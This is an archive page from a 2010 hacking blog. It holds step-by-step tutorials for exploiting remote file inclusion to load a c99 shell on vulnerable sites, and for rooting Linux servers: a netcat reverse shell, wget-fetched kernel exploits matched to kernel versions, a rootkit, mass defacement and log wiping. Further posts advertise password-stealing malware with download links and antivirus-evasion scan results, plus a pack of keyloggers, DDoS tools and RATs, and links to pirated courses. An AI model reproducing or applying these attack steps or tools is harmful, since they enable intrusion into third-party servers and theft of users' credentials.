August 2010 | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

How to hack websites using Remote file inlcusion



 By Adnan Anjum
I receive many E-mails on How To Hack websites so,
 today I will demonstrate how hackers use remote file inlcusion to deface websites.

Requirements
C99 shell


First of all visit google and type

"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.


Now lets say that the website is as follows:


www.targetsite.com/index.php?page=something


so to check the vulnerability we will replace the something to
Google or any other site now if Google homepage shows up this means that the website is vulnerable to the attack.The url will look like


                                                       
www.targetsite.com/index.php?page=www.google.com



Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as Welcome to Ripway.com - free file hosting, free music hosting, direct linking or Most Endorsed FREE Website Hosting Provider | Free Web Hosting


Once the shell is uploaded you will have a unique url for your shell lets say it is


www.webhostingsite.com/c99.txt


Now to execute the shell in order to gain access to the website we will do as follows


http://www.targetsite.com/index.php?...e.com/c99.txt?


Dont forgett the "?" or else it wont be executed.


Remeber this does not work on all websites so the key is to try and try and try and try! 

regards,
Adnan Anjum


Read More Add your Comment 3 comments


R.F.I. / Server Rooting Complete Tutorial



R.F.I. / Server Rooting Complete Tutorial 

By Adnan Anjum

================================================== =====================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

================================================== =====================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57, or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)
------------------------------------------------------------------------------
The purpose of this tutorial is to give a very general picture in process of Rooting
a Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/ind.../yourshell.txt

The "yourshell.txt" will be your remote shell.. The reason why we add a "?" at the end of the ".txt" is so the server will read it as a PHP File.. and not a normal text file.

After we enter in the shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (My IP is 94.228.220.186 - Quick and Easy way to SEE my IP address - CmyIP.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: .:[ packet storm ]:. - http://packetstormsecurity.org/ | arblan.com - arb lan Resources and Information.
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:
wget arblan.com - arb lan Resources and Information.

where arblan.com - arb lan Resources and Information. is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

Congratulations, You've got root!

/end.
Only For Educational Purposes I AM NOT RESPONSIBLE FOR IT,S MISUSE
Enjoy !


Read More Add your Comment 2 comments


400 Viruses In 1 File



400 Viruses In 1 File  
By Adnan Anjum

Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795ARCV.Scroll.dr)
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Univ/q
ARCV.330a
ARCV.255
Crew.2480
Univ/o
7thSon.426
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
APLittle.150
APLittle.147
APLittle.142a
APLittle.118a
APLittle.153
Univ.topsy
Anti-Pascal
Tiny-GM.129
Jerusalem
BtDr.Unk2
Jeru.1605
AntiMIT
Antiexe
Murphy
Thanksgiving.mp.1253a
Anticad.3012a
Anticad.mp.4096.d
Anticad.2900
Anticad.mp.4096.a
Anticad.2646
Anthrax.mp.1024
Univ.ow/d
Vacsina.1206
ARCV.Anna.742.dr
HLLP.Animus
Andromeda
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
and alot more


Code:
 .........................................


Read More Add your Comment 1 comments


[Ultimate Pack] Bruter, Binder, Keylogger, Proxies









Code:
2 Binder
+5 Bruter
+10 DDoser
+20 Fake Programs
a 36 Gigabyte PW-List
+1 000 000 Proxies
+20 Key logger
+5 Virus Builders
a nice song 4 stones 
A nice Port Scanner
A nice PW-Stealer
+5 Rat's[ NEW]




Read More Add your Comment 1 comments


ISR Stealer 0.3








Just one small update, added mail p***words revealer because one friend ask me to.
+Fixed some bugs

Last update date: 07/08/2010

Current Options:
+Send logs to my sql data ****(php)
+Bind one file(any extension)
+Change server icon
+Pack server with upx
+Steal options:
Internet Explorer 4/5/6/7/8
Mozilla Firefox 3.x.x
Google Chrome
Opera 8/9/10
Yahoo Messenger 8/9/10 P***word
Yahoo ETS
Msn Messenger
Pidgin
Windows Cd key
Filezilla
No-ip
DynDns
+Mail p***words:
Outlook Express
Microsoft Outlook 2000
Microsoft Outlook 2002/2003/2007/2010
Windows Mail
Windows Live Mail
IncrediMail
Eudora
Netscape 6.x/7.x
Mozilla Thunderbird
Yahoo! Mail
Hotmail/MSN mail
Gmail: Google Desktop and Google Talk

DownLad:
http://www.multiupload.com/FJD9KXAJF0

File Info

Report date: 2010-08-10 20:03:12 (GMT 1)
File name: isr-stealer-v0-3-exe
File size: 1968648 bytes
MD5 Hash: 2289e9119f0c994bc6b9e715f684c7db
SHA1 Hash: 192e33b0cffb0a54a9d10229acb86b83db9217d2
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG - PSW.Generic8.IXI
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
http://novirusthanks.org/
__________________


Read More Add your Comment 1 comments


Clock Stealer V2



Envoie/Send :
Nom de L'utilisateur/User Name
Nom du Pc/Computer Name
Systeme d'Exploitation/Operating System
Processeur/Processor
Antivirus
Firewall
ProRat V1.9 (S.Edition)
Version
-CamFro
-FireFox
-PidGin
Cle CD/CD Key
-Unreal Tournament 4
-Unreal Tournament 3
-Quake 4
-Ravenshield
-Pro Evolution Soccer 6
-Industry Giant 2
-Half-Life
-Call of Duty 2
-Company Of Heroes
-Gunman Chronicles
Mots de p***es/P***words
-Firefox
-NoIP
-MSN
-Ie
-Steam
Telechargement/Downloader
-Fichier EXE/EXE File

File Info

Report date: 2010-08-16 18:04:09 (GMT 1)
File name: clock-stealer-v2-exe
File size: 1010688 bytes
MD5 Hash: dfff7f17511c2baf5a5b05a7a0817664
SHA1 Hash: b7bb2e457523a17df5c1776bf1e306a78e5b78f3
Detection rate: 3 on 16 (19%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/Banker.Banker.ayjn
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky - Trojan-Banker.Win32.Banker.ayjn
NOD32 -
Panda -
TrendMicro -
VBA32 - TrojanBanker.Banker.ayjn
VirusBuster -

Scan report generated by

DownLoad:
http://www.2shared.com/file/Vwa5QtV6...tealer_V2.html


Read More Add your Comment 1 comments


Hacking Video Tutorials Free Download: Hacking Revealed Training



                                         Hacking Video Tutorials Free Download

Description: Hacking Revealed 5 Sessions 15 Hours of Interactive Training

In the Hacking Revealed course from LearnKey, system administrators, network security analysts, and IT professionals, who desire a broader understanding of security, learn how to protect their networks from external attack.

Expert instructor Dale Brice-Nash explains what motivates hackers and examines hacker tools.

He will demonstrate potential system vulnerabilities, hacker methodologies, current exploits, and effective approaches to risk management.

At the conclusion of this course, you'll understand how to evaluate hacker threats and how to avoid them.

Download from hotfile:
http://hotfile.com/dl/59927998/e93f945/Learnkey_Hacking_Revealed_5Cds-CBT.part01.rar.html
http://hotfile.com/dl/59928453/eb348c0/Learnkey_Hacking_Revealed_5Cds-CBT.part02.rar.html
http://hotfile.com/dl/59928485/7f2af00/Learnkey_Hacking_Revealed_5Cds-CBT.part03.rar.html
http://hotfile.com/dl/59928488/49b5f26/Learnkey_Hacking_Revealed_5Cds-CBT.part04.rar.html
http://hotfile.com/dl/59927995/bd8ff12/Learnkey_Hacking_Revealed_5Cds-CBT.part05.rar.html
http://hotfile.com/dl/59928420/051892f/Learnkey_Hacking_Revealed_5Cds-CBT.part06.rar.html
http://hotfile.com/dl/59927993/8cbadf7/Learnkey_Hacking_Revealed_5Cds-CBT.part07.rar.html
http://hotfile.com/dl/59927992/875b71b/Learnkey_Hacking_Revealed_5Cds-CBT.part08.rar.html
http://hotfile.com/dl/59927994/403624c/Learnkey_Hacking_Revealed_5Cds-CBT.part09.rar.html

Download from filserve:
http://www.fileserve.com/file/DbkEJc9
http://www.fileserve.com/file/mHfAKEm
http://www.fileserve.com/file/cdq2syc
http://www.fileserve.com/file/3yYSmMZ
http://www.fileserve.com/file/NRXhSaX
http://www.fileserve.com/file/G9MvCG5
http://www.fileserve.com/file/ejVQ78H
http://www.fileserve.com/file/hWx2jB5
http://www.fileserve.com/file/xFzWwV7


Read More Add your Comment 2 comments


Download Total Training – CSS & XHTML for Web Development



Download Total Training – CSS & XHTML for Web Development | 568 MB | 8 hrs

With Total Training for CSS & XHTML Web Development you’ll learn the process of building a structure for your web pages and then styling those web pages so that they look polished and professional, in the style and design you format. Cascading Style Sheets (CSS) is a versatile
scripting language that allows designers great flexibility in terms of the visual appearance for a site they wish to create and affords them the means to change that appearance without having to recode web pages. This flexibility and the best practices you’ll learn during the design process can turn an average web designer into a top notch designer, which will help you build your portfolio and client list.


Course Outline:

Chapter 1: INTRODUCTION TO BUILDING A WEB PAGE (56 min)

1. What is HTML?
2. Setting Up the Text Editor to Create XHTML
3. Creating Your First HTML File
4. Adding Formatting Tags & Previewing in a Browser
5. Getting Started with Cascading Style Sheets
6. How Pages are Served Up
7. Choosing an Editor
8. Project Management

Chapter 2: CREATING HTML DOCUMENTS (63 min)

1. Understanding Tags, Elements & Attributes
2. Defining the Basic Structure with HTML, HEAD & BODY
3. Assigning a Title & Using Paragraphs
4. Using Heading Tags & Whitespace
5. Creating Unordered & Ordered Lists
6. Fine-tuning Tags with Attributes
7. Adding Bold & Italics
8. Understanding How a Browser Reads HTML
9. Doc Types & Browsers

Chapter 3: INTRODUCTION TO CSS (72 min)

1. What is CSS?
2. Internal Style Sheets, Selectors, Properties & Values
3. Building & Applying Class Selectors
4. Grouping Selectors
5. Creating Comments in Your Code
6. Using Div Tags & IDs to Format Layout
7. Understanding the Cascade & Avoiding Conflicts

Chapter 4: ADDING IMAGES (43 min)

1. Image Formats & Production Considerations
2. Optimizing Images for the Web
3. Introducing the IMG Tag
4. Relative vs. Absolute URLs
5. Fine-Tuning with Alt, Width & Height Attributes

Chapter 5: ANCHORS & HYPERLINKS (50 min)

1. Creating Hyperlinks to Outside Websites
2. Creating Hyperlinks Between Documents
3. Linking to Email Addresses
4. Linking to a Specific Part of a Webpage
5. Linking Images

Chapter 6: MORE CSS TECHNIQUES (35 min)

1. Managing CSS with External Style Sheets
2. Setting Hyperlinks with Pseudo-Classes
3. The CSS Box Model: Padding, Borders & Margins
4. Styling Unordered & Ordered Lists with CSS
5. Overriding the Inheritance of Attributes

Chapter 7: ORGANIZING INFORMATION WITH TABLES & DEFINITION LISTS (46 min)

1. Creating Tables & Table Attributes
2. Adding & Formatting Rows & Columns
3. Spanning Rows & Columns
4. Increasing Table Accessibility
5. Using Definition Lists to Organize Definition-Based Data
6. Using HTML Comments

Chapter 8: CREATING LAYOUTS (61 min)

1. Adding a Side Content Div to Your Layout
2. Applying Absolute Positioning
3. Applying Relative Positioning
4. Using the Float & Clear Properties
5. Understanding Overflow
6. Creating Auto-Centering Content
7. Using Fixed Positioning

Chapter 9: INTRODUCTION TO ADOBE¨ DREAMWEAVER¨ (39 min)

1. Getting Started with Dreamweaver & Setting Preferences
2. Creating a Local Site & Importing Files
3. Working in the Code, Design, & Split Views
4. Configuring FTP Options & Publishing Through Synchronization
5. Validating Your Code

Chapter 10: WORKING WITH DREAMWEAVER (21 min)

1. Editing Style Sheets in the CSS Panel
2. Creating Description & Keyword Meta Tags
3. Using Dreamweaver to Preview in a Web Browser
4. Credits

Download from Hotfile
http://hotfile.com/dl/33673770/3e4b9c4/TT-CSS.XHTML.for.Web.Development.part1.rar.html
http://hotfile.com/dl/33673775/9c73fec/TT-
CSS.XHTML.for.Web.Development.part2.rar.html
http://hotfile.com/dl/33673787/cc80aff/TT-
CSS.XHTML.for.Web.Development.part3.rar.html
http://hotfile.com/dl/33673799/b1811cd/TT-CSS.XHTML.for.Web.Development.part4.rar.html

Uploading
http://uploading.com/files/5d827baa/TT-
CSS.XHTML.for.Web.Development.part4.rar/
http://uploading.com/files/5m92c13f/TT-
CSS.XHTML.for.Web.Development.part3.rar/
http://uploading.com/files/dd93d22m/TT-
CSS.XHTML.for.Web.Development.part2.rar/
http://uploading.com/files/29f5eb62/TT-
CSS.XHTML.for.Web.Development.part1.rar/


Read More Add your Comment 16 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com